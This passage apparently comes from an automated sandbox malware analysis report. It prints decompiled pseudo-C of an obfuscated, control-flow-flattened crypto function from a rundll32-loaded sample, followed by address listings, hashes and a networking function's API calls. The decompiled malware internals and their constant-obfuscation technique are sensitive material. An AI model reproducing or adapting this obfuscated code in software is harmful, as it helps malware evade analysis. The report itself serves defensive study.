                                                                                                                      • Instruction Fuzzy Hash: 79224271508380DFD7A8CF65C58AA9BFBE6FBC4744F10891DE29A86260D7B58849CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00696DF8 Relevance: 15.5, Strings: 12, Instructions: 510COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00696DF8(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				short _v1568;
				short _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1592;
				char _v1596;
				char _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				signed int _v1804;
				signed int _v1808;
				signed int _v1812;
				signed int _v1816;
				signed int _v1820;
				signed int _v1824;
				signed int _v1828;
				signed int _v1832;
				signed int _v1836;
				signed int _v1840;
				signed int _v1844;
				void* _t583;
				void* _t585;
				void* _t592;
				void* _t603;
				void* _t606;
				void* _t609;
				signed int _t611;
				signed int _t612;
				signed int _t613;
				signed int _t614;
				signed int _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t619;
				void* _t620;
				signed int _t674;
				char _t675;
				void* _t677;
				signed int* _t682;

				_t682 =  &_v1844;
				_v1580 = 0x812dcc;
				_v1600 = 0;
				_v1572 = 0;
				_v1568 = 0;
				_v1576 = 0x4b1be1;
				_v1604 = 0xb0e9fc;
				_v1604 = _v1604 >> 0xe;
				_v1604 = _v1604 ^ 0x020002c3;
				_v1816 = 0x316963;
				_v1816 = _v1816 ^ 0x05c37e76;
				_v1816 = _v1816 * 0x44;
				_t609 = __ecx;
				_v1816 = _v1816 << 6;
				_t677 = 0xb42e112;
				_v1816 = _v1816 ^ 0x13878f70;
				_v1648 = 0xe65aa1;
				_v1648 = _v1648 + 0xffffb7c7;
				_v1648 = _v1648 ^ 0x00e866e0;
				_v1608 = 0x4e6d43;
				_v1608 = _v1608 << 3;
				_v1608 = _v1608 ^ 0x027e4d7c;
				_v1792 = 0x62c447;
				_v1792 = _v1792 + 0xfffff9b0;
				_v1792 = _v1792 + 0xffff1ab6;
				_v1792 = _v1792 ^ 0x5826ec20;
				_v1792 = _v1792 ^ 0x58465e47;
				_v1616 = 0xd881ce;
				_t611 = 0x1c;
				_v1616 = _v1616 / _t611;
				_v1616 = _v1616 ^ 0x00049a8c;
				_v1784 = 0x225701;
				_v1784 = _v1784 ^ 0x455f73cc;
				_v1784 = _v1784 + 0x2d0b;
				_v1784 = _v1784 + 0xffff7069;
				_v1784 = _v1784 ^ 0x457ed570;
				_v1656 = 0xa0746c;
				_v1656 = _v1656 << 5;
				_v1656 = _v1656 ^ 0x1405cb88;
				_v1756 = 0x86f3a;
				_v1756 = _v1756 << 0xf;
				_v1756 = _v1756 + 0xffff9aa0;
				_v1756 = _v1756 ^ 0x379e88f8;
				_v1840 = 0x372205;
				_v1840 = _v1840 << 0xb;
				_v1840 = _v1840 >> 1;
				_t612 = 0x47;
				_v1840 = _v1840 * 0x27;
				_v1840 = _v1840 ^ 0x18b0e4c5;
				_v1720 = 0x55473e;
				_v1720 = _v1720 >> 0xe;
				_v1720 = _v1720 + 0xffff4222;
				_v1720 = _v1720 ^ 0xfff7d1f7;
				_v1760 = 0x8a22d4;
				_v1760 = _v1760 ^ 0x5338d916;
				_v1760 = _v1760 / _t612;
				_v1760 = _v1760 ^ 0x01221ec9;
				_v1716 = 0x7ad7ec;
				_v1716 = _v1716 ^ 0xb2734e10;
				_v1716 = _v1716 ^ 0xf628ba0e;
				_v1716 = _v1716 ^ 0x44287105;
				_v1624 = 0x6426f4;
				_v1624 = _v1624 * 0x29;
				_v1624 = _v1624 ^ 0x100ef306;
				_v1728 = 0x3e505e;
				_v1728 = _v1728 >> 8;
				_t613 = 0x3a;
				_v1728 = _v1728 / _t613;
				_v1728 = _v1728 ^ 0x00050efb;
				_v1752 = 0x3958e2;
				_v1752 = _v1752 ^ 0x62ae6d50;
				_v1752 = _v1752 ^ 0x97f7befb;
				_v1752 = _v1752 ^ 0xf561088c;
				_v1688 = 0xb21a91;
				_v1688 = _v1688 ^ 0x7ffc0397;
				_v1688 = _v1688 ^ 0x7f439e8f;
				_v1620 = 0xd8d2d1;
				_v1620 = _v1620 + 0x194e;
				_v1620 = _v1620 ^ 0x00d523c5;
				_v1696 = 0xa820cb;
				_v1696 = _v1696 + 0x8b3c;
				_v1696 = _v1696 ^ 0x00a28581;
				_v1680 = 0x121bc4;
				_t674 = 0x7a;
				_v1680 = _v1680 / _t674;
				_v1680 = _v1680 ^ 0x0006e996;
				_v1744 = 0x9924c6;
				_v1744 = _v1744 << 4;
				_t614 = 0x11;
				_v1744 = _v1744 * 0x36;
				_v1744 = _v1744 ^ 0x04d385a1;
				_v1632 = 0x653a8;
				_v1632 = _v1632 * 0x63;
				_v1632 = _v1632 ^ 0x027c9a7f;
				_v1672 = 0x158278;
				_v1672 = _v1672 + 0xffff088d;
				_v1672 = _v1672 ^ 0x001491ab;
				_v1832 = 0x486b88;
				_v1832 = _v1832 + 0xffff9f3d;
				_v1832 = _v1832 >> 3;
				_v1832 = _v1832 | 0x023d4c2b;
				_v1832 = _v1832 ^ 0x0230cd37;
				_v1612 = 0xd2c4ef;
				_v1612 = _v1612 * 0x5a;
				_v1612 = _v1612 ^ 0x4a177333;
				_v1776 = 0x829598;
				_v1776 = _v1776 << 0xe;
				_v1776 = _v1776 >> 2;
				_v1776 = _v1776 | 0x8c8c5501;
				_v1776 = _v1776 ^ 0xaddb19b6;
				_v1712 = 0x169d18;
				_v1712 = _v1712 / _t614;
				_v1712 = _v1712 >> 0xa;
				_v1712 = _v1712 ^ 0x000c26db;
				_v1704 = 0xb2b50;
				_v1704 = _v1704 ^ 0x2de07b8f;
				_v1704 = _v1704 ^ 0x2de0ad86;
				_v1800 = 0x9652d5;
				_t615 = 3;
				_v1800 = _v1800 * 0x68;
				_v1800 = _v1800 / _t615;
				_v1800 = _v1800 << 0xa;
				_v1800 = _v1800 ^ 0x6cd74e85;
				_v1664 = 0x74acab;
				_v1664 = _v1664 | 0xe18c4dd2;
				_v1664 = _v1664 ^ 0xe1f0b032;
				_v1824 = 0x58e83b;
				_t616 = 0x2c;
				_v1824 = _v1824 * 0x2b;
				_v1824 = _v1824 + 0xffff56af;
				_v1824 = _v1824 ^ 0x0c61ca29;
				_v1824 = _v1824 ^ 0x02809c1e;
				_v1764 = 0x974237;
				_v1764 = _v1764 << 0xb;
				_v1764 = _v1764 * 0x31;
				_v1764 = _v1764 ^ 0x9d674e65;
				_v1736 = 0xc3f98b;
				_v1736 = _v1736 * 0x5e;
				_v1736 = _v1736 | 0x641bd8e3;
				_v1736 = _v1736 ^ 0x67f85735;
				_v1700 = 0xe4f15c;
				_v1700 = _v1700 | 0xddaa88b0;
				_v1700 = _v1700 ^ 0xdde3c6d3;
				_v1844 = 0x9b3502;
				_v1844 = _v1844 ^ 0x47d60286;
				_v1844 = _v1844 / _t616;
				_v1844 = _v1844 ^ 0x0193d551;
				_v1640 = 0xffe1b1;
				_t617 = 0x39;
				_v1640 = _v1640 * 0x7b;
				_v1640 = _v1640 ^ 0x7af2e2c5;
				_v1808 = 0x2876e6;
				_v1808 = _v1808 | 0x109585e0;
				_v1808 = _v1808 << 0xd;
				_v1808 = _v1808 + 0x9cd3;
				_v1808 = _v1808 ^ 0xbefbba98;
				_v1676 = 0xd3b2e1;
				_v1676 = _v1676 << 0xf;
				_v1676 = _v1676 ^ 0xd9748eec;
				_v1836 = 0x3e007f;
				_v1836 = _v1836 + 0xffffe462;
				_v1836 = _v1836 >> 9;
				_v1836 = _v1836 >> 6;
				_v1836 = _v1836 ^ 0x000afa23;
				_v1684 = 0x2c402;
				_v1684 = _v1684 >> 0xa;
				_v1684 = _v1684 ^ 0x0000130c;
				_v1692 = 0x94252b;
				_v1692 = _v1692 / _t617;
				_v1692 = _v1692 ^ 0x000dcb04;
				_v1828 = 0xd5c7f6;
				_v1828 = _v1828 * 0x41;
				_v1828 = _v1828 + 0x5616;
				_v1828 = _v1828 >> 9;
				_v1828 = _v1828 ^ 0x001e39c7;
				_v1740 = 0xceff06;
				_v1740 = _v1740 << 0xe;
				_v1740 = _v1740 << 8;
				_v1740 = _v1740 ^ 0xc18fb5bb;
				_v1748 = 0x414330;
				_v1748 = _v1748 * 0x1d;
				_v1748 = _v1748 | 0x5a6f0d55;
				_v1748 = _v1748 ^ 0x5f6ea92a;
				_v1668 = 0xd2b255;
				_v1668 = _v1668 ^ 0xc5d7949e;
				_v1668 = _v1668 ^ 0xc50ba027;
				_v1796 = 0xab825d;
				_v1796 = _v1796 << 0xc;
				_v1796 = _v1796 + 0xd01b;
				_t618 = 0x22;
				_v1796 = _v1796 / _t618;
				_v1796 = _v1796 ^ 0x056bf222;
				_v1724 = 0x6f3f31;
				_v1724 = _v1724 + 0x5a62;
				_v1724 = _v1724 / _t674;
				_v1724 = _v1724 ^ 0x0002d040;
				_v1652 = 0x230f16;
				_v1652 = _v1652 ^ 0x902061d9;
				_v1652 = _v1652 ^ 0x9007a9ef;
				_v1804 = 0xb250d0;
				_v1804 = _v1804 << 7;
				_v1804 = _v1804 << 0xe;
				_v1804 = _v1804 >> 0x10;
				_v1804 = _v1804 ^ 0x000e0b76;
				_v1644 = 0x39b2ec;
				_v1644 = _v1644 >> 5;
				_v1644 = _v1644 ^ 0x0004ae9a;
				_v1708 = 0x41b5f8;
				_v1708 = _v1708 << 9;
				_v1708 = _v1708 + 0xfffffd74;
				_v1708 = _v1708 ^ 0x836650ae;
				_v1768 = 0xd924a5;
				_t619 = 0x26;
				_v1768 = _v1768 * 0x57;
				_v1768 = _v1768 >> 4;
				_v1768 = _v1768 ^ 0x04932b37;
				_v1788 = 0x72a9d;
				_v1788 = _v1788 >> 0xb;
				_v1788 = _v1788 * 0x3f;
				_v1788 = _v1788 + 0xffffc8d5;
				_v1788 = _v1788 ^ 0x000eb520;
				_v1628 = 0x50edf9;
				_v1628 = _v1628 * 0x73;
				_v1628 = _v1628 ^ 0x245d5801;
				_v1772 = 0x77fe3c;
				_v1772 = _v1772 + 0x89a9;
				_v1772 = _v1772 | 0x772eb6e7;
				_v1772 = _v1772 + 0xffffc435;
				_v1772 = _v1772 ^ 0x777a10e8;
				_v1780 = 0x481950;
				_v1780 = _v1780 >> 0xb;
				_v1780 = _v1780 | 0x104efd63;
				_v1780 = _v1780 + 0xffffd02c;
				_v1780 = _v1780 ^ 0x1043876c;
				_v1636 = 0x899427;
				_v1636 = _v1636 << 0x10;
				_v1636 = _v1636 ^ 0x942ef0bd;
				_v1812 = 0xafb495;
				_v1812 = _v1812 | 0xf73eef3e;
				_v1812 = _v1812 + 0xffffb280;
				_v1812 = _v1812 ^ 0xf7b4985a;
				_v1732 = 0xe6dab0;
				_v1732 = _v1732 + 0x38b;
				_v1732 = _v1732 | 0x5f912f35;
				_v1732 = _v1732 ^ 0x5ff91c81;
				_v1660 = 0xa1ff8d;
				_v1660 = _v1660 / _t619;
				_v1660 = _v1660 ^ 0x000a69c5;
				_v1820 = 0xd15a88;
				_v1820 = _v1820 ^ 0xcd50b9e8;
				_v1820 = _v1820 >> 0x10;
				_v1820 = _v1820 ^ 0xf9319330;
				_v1820 = _v1820 ^ 0xf933c487;
				_t675 = _v1600;
				while(1) {
					L1:
					while(1) {
						L2:
						_t620 = 0x424d9d2;
						do {
							L3:
							while(_t677 != 0x19ebf08) {
								if(_t677 == _t620) {
									_push(_v1600);
									_push(_v1808);
									_t585 = E0069D389( &_v1564, _v1844, _t620,  &_v1596, _v1640, _t620);
									_t682 =  &(_t682[7]);
									__eflags = _t585;
									if(__eflags != 0) {
										E00691E67(_v1676, _v1836, _v1684, _v1692, _v1596);
										E00691E67(_v1828, _v1740, _v1748, _v1668, _v1592);
										_t682 =  &(_t682[6]);
									}
									L14:
									_t677 = 0x19ebf08;
									while(1) {
										L1:
										L2:
										_t620 = 0x424d9d2;
										goto L3;
									}
								}
								if(_t677 == 0x5bc69f5) {
									_t592 = E0069D2CE(_t620);
									__eflags = _t592 - E00683DE2(_t620);
									_t583 = 0x7574965;
									_t677 = 0x8166b1d;
									_t675 =  !=  ? 0x7574965 : 0x1e8df70;
									goto L2;
								}
								if(_t677 == 0x8166b1d) {
									__eflags = _t675 - _t583;
									if(__eflags != 0) {
										_t677 = 0xd369ee2;
										continue;
									}
									_push(_t620);
									_push(_t620);
									_t606 = E0069BB23( &_v1600, _v1616, _v1784, _v1656, _v1604, _v1756);
									_t682 =  &(_t682[6]);
									__eflags = _t606;
									if(__eflags == 0) {
										L12:
										return _t606;
									}
									_t677 = 0xd369ee2;
									goto L1;
								}
								if(_t677 == 0xb42e112) {
									_t677 = 0x5bc69f5;
									continue;
								}
								if(_t677 == 0xd369ee2) {
									E0069DA22(_v1840, _v1720, __eflags, _v1760,  &_v1044, _t620, _v1716);
									 *((short*)(E0068B6CF( &_v1044, _v1624, _v1728, _v1752))) = 0;
									E00688969(_v1688,  &_v524, __eflags, _v1620, _v1696);
									_push(_v1632);
									_push(_v1744);
									E006847CE( &_v1044, _v1672, _v1680, _v1832, _v1612, E0069DCF7(_v1680, 0x681328, __eflags),  &_v524, _v1776, _v1712);
									E0068A8B0(_v1704, _t598, _v1800);
									_t603 = E0068EA99(_v1664, _t609, _v1824, _v1764,  &_v1564, _v1736);
									_t682 =  &(_t682[0x17]);
									__eflags = _t603;
									if(__eflags != 0) {
										_t583 = 0x7574965;
										__eflags = _t675 - 0x7574965;
										_t620 = 0x424d9d2;
										_t677 =  ==  ? 0x424d9d2 : 0xe2e667c;
										continue;
									}
									goto L14;
								}
								_t696 = _t677 - 0xe2e667c;
								if(_t677 != 0xe2e667c) {
									goto L25;
								}
								_push(_v1804);
								_push( &_v1564);
								_push(_t620);
								_push(0);
								_push( &_v1596);
								_push(_v1652);
								_push(0);
								_t606 = E0068AB87(_v1796, _v1724, _t696);
								if(_t606 == 0) {
									goto L12;
								}
								E00691E67(_v1644, _v1708, _v1768, _v1788, _v1596);
								return E00691E67(_v1628, _v1772, _v1780, _v1636, _v1592);
							}
							E00691E67(_v1812, _v1732, _v1660, _v1820, _v1600);
							_t682 =  &(_t682[3]);
							_t677 = 0xe6feec1;
							_t583 = 0x7574965;
							_t620 = 0x424d9d2;
							L25:
							__eflags = _t677 - 0xe6feec1;
						} while (__eflags != 0);
						return _t583;
					}
				}
			}






























































































                                                                                                                      0x00696df8
                                                                                                                      0x00696dfe
                                                                                                                      0x00696e0b
                                                                                                                      0x00696e14
                                                                                                                      0x00696e1b
                                                                                                                      0x00696e22
                                                                                                                      0x00696e2d
                                                                                                                      0x00696e38
                                                                                                                      0x00696e40
                                                                                                                      0x00696e4b
                                                                                                                      0x00696e53
                                                                                                                      0x00696e64
                                                                                                                      0x00696e68
                                                                                                                      0x00696e6a
                                                                                                                      0x00696e6f
                                                                                                                      0x00696e74
                                                                                                                      0x00696e7c
                                                                                                                      0x00696e87
                                                                                                                      0x00696e92
                                                                                                                      0x00696e9d
                                                                                                                      0x00696ea8
                                                                                                                      0x00696eb0
                                                                                                                      0x00696ebb
                                                                                                                      0x00696ec3
                                                                                                                      0x00696ecb
                                                                                                                      0x00696ed3
                                                                                                                      0x00696edb
                                                                                                                      0x00696ee3
                                                                                                                      0x00696ef7
                                                                                                                      0x00696efc
                                                                                                                      0x00696f05
                                                                                                                      0x00696f10
                                                                                                                      0x00696f18
                                                                                                                      0x00696f20
                                                                                                                      0x00696f28
                                                                                                                      0x00696f30
                                                                                                                      0x00696f38
                                                                                                                      0x00696f43
                                                                                                                      0x00696f4b
                                                                                                                      0x00696f56
                                                                                                                      0x00696f5e
                                                                                                                      0x00696f63
                                                                                                                      0x00696f6b
                                                                                                                      0x00696f73
                                                                                                                      0x00696f7b
                                                                                                                      0x00696f80
                                                                                                                      0x00696f89
                                                                                                                      0x00696f8a
                                                                                                                      0x00696f8e
                                                                                                                      0x00696f96
                                                                                                                      0x00696fa1
                                                                                                                      0x00696fa9
                                                                                                                      0x00696fb4
                                                                                                                      0x00696fbf
                                                                                                                      0x00696fc7
                                                                                                                      0x00696fd5
                                                                                                                      0x00696fd9
                                                                                                                      0x00696fe1
                                                                                                                      0x00696fec
                                                                                                                      0x00696ff7
                                                                                                                      0x00697002
                                                                                                                      0x0069700d
                                                                                                                      0x00697020
                                                                                                                      0x00697027
                                                                                                                      0x00697032
                                                                                                                      0x0069703d
                                                                                                                      0x00697050
                                                                                                                      0x00697055
                                                                                                                      0x0069705e
                                                                                                                      0x00697069
                                                                                                                      0x00697071
                                                                                                                      0x00697079
                                                                                                                      0x00697081
                                                                                                                      0x00697089
                                                                                                                      0x00697094
                                                                                                                      0x0069709f
                                                                                                                      0x006970aa
                                                                                                                      0x006970b5
                                                                                                                      0x006970c0
                                                                                                                      0x006970cb
                                                                                                                      0x006970d6
                                                                                                                      0x006970e1
                                                                                                                      0x006970ec
                                                                                                                      0x006970fe
                                                                                                                      0x00697103
                                                                                                                      0x0069710c
                                                                                                                      0x00697117
                                                                                                                      0x0069711f
                                                                                                                      0x00697129
                                                                                                                      0x0069712c
                                                                                                                      0x00697130
                                                                                                                      0x00697138
                                                                                                                      0x0069714b
                                                                                                                      0x00697152
                                                                                                                      0x0069715d
                                                                                                                      0x00697168
                                                                                                                      0x00697173
                                                                                                                      0x0069717e
                                                                                                                      0x00697186
                                                                                                                      0x0069718e
                                                                                                                      0x00697193
                                                                                                                      0x0069719b
                                                                                                                      0x006971a3
                                                                                                                      0x006971b6
                                                                                                                      0x006971bd
                                                                                                                      0x006971c8
                                                                                                                      0x006971d0
                                                                                                                      0x006971d5
                                                                                                                      0x006971da
                                                                                                                      0x006971e2
                                                                                                                      0x006971ea
                                                                                                                      0x00697200
                                                                                                                      0x00697207
                                                                                                                      0x0069720f
                                                                                                                      0x0069721a
                                                                                                                      0x00697225
                                                                                                                      0x00697230
                                                                                                                      0x0069723b
                                                                                                                      0x00697248
                                                                                                                      0x00697249
                                                                                                                      0x00697253
                                                                                                                      0x00697257
                                                                                                                      0x0069725c
                                                                                                                      0x00697264
                                                                                                                      0x0069726f
                                                                                                                      0x0069727a
                                                                                                                      0x00697285
                                                                                                                      0x00697296
                                                                                                                      0x00697299
                                                                                                                      0x0069729d
                                                                                                                      0x006972a5
                                                                                                                      0x006972ad
                                                                                                                      0x006972b5
                                                                                                                      0x006972bd
                                                                                                                      0x006972c7
                                                                                                                      0x006972cb
                                                                                                                      0x006972d3
                                                                                                                      0x006972e6
                                                                                                                      0x006972ed
                                                                                                                      0x006972f8
                                                                                                                      0x00697303
                                                                                                                      0x0069730e
                                                                                                                      0x00697319
                                                                                                                      0x00697324
                                                                                                                      0x0069732c
                                                                                                                      0x00697344
                                                                                                                      0x00697348
                                                                                                                      0x00697350
                                                                                                                      0x00697363
                                                                                                                      0x00697366
                                                                                                                      0x0069736d
                                                                                                                      0x00697378
                                                                                                                      0x00697380
                                                                                                                      0x00697388
                                                                                                                      0x0069738d
                                                                                                                      0x00697395
                                                                                                                      0x0069739d
                                                                                                                      0x006973a8
                                                                                                                      0x006973b0
                                                                                                                      0x006973bb
                                                                                                                      0x006973c3
                                                                                                                      0x006973cb
                                                                                                                      0x006973d0
                                                                                                                      0x006973d5
                                                                                                                      0x006973dd
                                                                                                                      0x006973e8
                                                                                                                      0x006973f0
                                                                                                                      0x006973fb
                                                                                                                      0x0069740f
                                                                                                                      0x00697416
                                                                                                                      0x00697421
                                                                                                                      0x0069742e
                                                                                                                      0x00697432
                                                                                                                      0x0069743a
                                                                                                                      0x0069743f
                                                                                                                      0x00697447
                                                                                                                      0x0069744f
                                                                                                                      0x00697454
                                                                                                                      0x00697459
                                                                                                                      0x00697461
                                                                                                                      0x0069746e
                                                                                                                      0x00697472
                                                                                                                      0x0069747a
                                                                                                                      0x00697482
                                                                                                                      0x0069748d
                                                                                                                      0x00697498
                                                                                                                      0x006974a3
                                                                                                                      0x006974ab
                                                                                                                      0x006974b0
                                                                                                                      0x006974be
                                                                                                                      0x006974c8
                                                                                                                      0x006974cc
                                                                                                                      0x006974d4
                                                                                                                      0x006974df
                                                                                                                      0x006974f5
                                                                                                                      0x006974fe
                                                                                                                      0x00697509
                                                                                                                      0x00697514
                                                                                                                      0x0069751f
                                                                                                                      0x0069752a
                                                                                                                      0x00697532
                                                                                                                      0x00697537
                                                                                                                      0x0069753c
                                                                                                                      0x00697541
                                                                                                                      0x00697549
                                                                                                                      0x00697554
                                                                                                                      0x0069755c
                                                                                                                      0x00697567
                                                                                                                      0x00697572
                                                                                                                      0x0069757a
                                                                                                                      0x00697585
                                                                                                                      0x00697590
                                                                                                                      0x0069759d
                                                                                                                      0x0069759e
                                                                                                                      0x006975a2
                                                                                                                      0x006975a7
                                                                                                                      0x006975af
                                                                                                                      0x006975b7
                                                                                                                      0x006975c1
                                                                                                                      0x006975c5
                                                                                                                      0x006975cd
                                                                                                                      0x006975d5
                                                                                                                      0x006975e8
                                                                                                                      0x006975ef
                                                                                                                      0x006975fa
                                                                                                                      0x00697602
                                                                                                                      0x0069760a
                                                                                                                      0x00697612
                                                                                                                      0x0069761a
                                                                                                                      0x00697622
                                                                                                                      0x0069762a
                                                                                                                      0x0069762f
                                                                                                                      0x00697637
                                                                                                                      0x0069763f
                                                                                                                      0x00697647
                                                                                                                      0x00697652
                                                                                                                      0x0069765a
                                                                                                                      0x00697665
                                                                                                                      0x0069766d
                                                                                                                      0x00697675
                                                                                                                      0x0069767d
                                                                                                                      0x00697685
                                                                                                                      0x00697690
                                                                                                                      0x0069769b
                                                                                                                      0x006976a6
                                                                                                                      0x006976b1
                                                                                                                      0x006976c5
                                                                                                                      0x006976cc
                                                                                                                      0x006976d7
                                                                                                                      0x006976df
                                                                                                                      0x006976e7
                                                                                                                      0x006976ec
                                                                                                                      0x006976f4
                                                                                                                      0x006976fc
                                                                                                                      0x00697703
                                                                                                                      0x00697703
                                                                                                                      0x00697708
                                                                                                                      0x00697708
                                                                                                                      0x00697708
                                                                                                                      0x0069770d
                                                                                                                      0x00000000
                                                                                                                      0x0069770d
                                                                                                                      0x00697717
                                                                                                                      0x0069799c
                                                                                                                      0x006979aa
                                                                                                                      0x006979ca
                                                                                                                      0x006979cf
                                                                                                                      0x006979d2
                                                                                                                      0x006979d4
                                                                                                                      0x006979fa
                                                                                                                      0x00697a1f
                                                                                                                      0x00697a24
                                                                                                                      0x00697a24
                                                                                                                      0x006978e9
                                                                                                                      0x006978e9
                                                                                                                      0x00697703
                                                                                                                      0x00697703
                                                                                                                      0x00697708
                                                                                                                      0x00697708
                                                                                                                      0x00000000
                                                                                                                      0x00697708
                                                                                                                      0x00697703
                                                                                                                      0x00697723
                                                                                                                      0x00697977
                                                                                                                      0x00697983
                                                                                                                      0x0069798a
                                                                                                                      0x0069798f
                                                                                                                      0x00697994
                                                                                                                      0x00000000
                                                                                                                      0x00697994
                                                                                                                      0x0069772f
                                                                                                                      0x00697913
                                                                                                                      0x00697915
                                                                                                                      0x00697957
                                                                                                                      0x00000000
                                                                                                                      0x00697957
                                                                                                                      0x00697917
                                                                                                                      0x00697918
                                                                                                                      0x0069793d
                                                                                                                      0x00697942
                                                                                                                      0x00697945
                                                                                                                      0x00697947
                                                                                                                      0x006977e4
                                                                                                                      0x006977e4
                                                                                                                      0x006977e4
                                                                                                                      0x0069794d
                                                                                                                      0x00000000
                                                                                                                      0x0069794d
                                                                                                                      0x0069773b
                                                                                                                      0x00697909
                                                                                                                      0x00000000
                                                                                                                      0x00697909
                                                                                                                      0x00697747
                                                                                                                      0x00697804
                                                                                                                      0x0069783e
                                                                                                                      0x00697848
                                                                                                                      0x0069784d
                                                                                                                      0x00697859
                                                                                                                      0x006978a6
                                                                                                                      0x006978b8
                                                                                                                      0x006978dd
                                                                                                                      0x006978e2
                                                                                                                      0x006978e5
                                                                                                                      0x006978e7
                                                                                                                      0x006978f0
                                                                                                                      0x006978fa
                                                                                                                      0x006978fc
                                                                                                                      0x00697901
                                                                                                                      0x00000000
                                                                                                                      0x00697901
                                                                                                                      0x00000000
                                                                                                                      0x006978e7
                                                                                                                      0x0069774d
                                                                                                                      0x00697753
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00697759
                                                                                                                      0x00697764
                                                                                                                      0x00697765
                                                                                                                      0x00697766
                                                                                                                      0x0069776f
                                                                                                                      0x00697770
                                                                                                                      0x00697782
                                                                                                                      0x00697784
                                                                                                                      0x0069778e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x006977ad
                                                                                                                      0x00000000
                                                                                                                      0x006977d7
                                                                                                                      0x00697a49
                                                                                                                      0x00697a4e
                                                                                                                      0x00697a51
                                                                                                                      0x00697a56
                                                                                                                      0x00697a5b
                                                                                                                      0x00697a60
                                                                                                                      0x00697a60
                                                                                                                      0x00697a60
                                                                                                                      0x00000000
                                                                                                                      0x0069770d
                                                                                                                      0x00697708

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 1?o$;X$>GU$CmN$G^FX$UoZ$^P>$bZ$ci1$X9$f$v(
                                                                                                                      • API String ID: 0-2206596976
                                                                                                                      • Opcode ID: 09816bc3c1c62b05e510fa23086c62f0d6b02506cbfae4b7e85db321126d79a0
                                                                                                                      • Instruction ID: e2e5a158808e940e23a93387daa76d7e4df807a7c0634e554df0326cf342ecc3
                                                                                                                      • Opcode Fuzzy Hash: 09816bc3c1c62b05e510fa23086c62f0d6b02506cbfae4b7e85db321126d79a0
                                                                                                                      • Instruction Fuzzy Hash: A352FE715083818BD7B8CF61C54AB9FBBE2BBC4308F108A1DE5DA96260D7B18949CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10012C30 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 156networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 10012C6C
                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 10012CA7
                                                                                                                      • _strcat.LIBCMT ref: 10012CE9
                                                                                                                      • send.WS2_32(?,?,00000064,00000000), ref: 10012D06
                                                                                                                      • recv.WS2_32(000000FF,?,00000064,00000000), ref: 10012D9D
                                                                                                                        • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                        • Part of subcall function 1001DD46: GetDlgItem.USER32(?,CD5FCEB9), ref: 1001DD53
                                                                                                                        • Part of subcall function 1001DDF4: SetWindowTextA.USER32(?,00000064), ref: 1001DE2B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnableItemText_memset_strcatconnectrecvsend
                                                                                                                      • String ID: Connected$Disconnected$Wait...
                                                                                                                      • API String ID: 2263617321-2304371739
                                                                                                                      • Opcode ID: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                      • Instruction ID: 809deafcd8a1ebdff950075e8a5ab3cba01c3ccaf73ffb16f134ff4a091f78a6
